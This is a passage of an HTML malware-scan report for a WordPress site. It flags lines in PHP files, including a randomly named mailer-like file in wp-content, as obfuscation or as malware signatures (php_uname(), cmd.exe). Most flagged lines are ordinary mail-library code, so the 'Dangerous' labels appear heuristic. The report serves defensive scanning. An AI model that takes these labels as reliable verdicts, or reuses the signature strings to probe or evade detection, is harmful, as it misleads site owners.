</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_181").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/ZBJXuAVMU4d.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_182" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
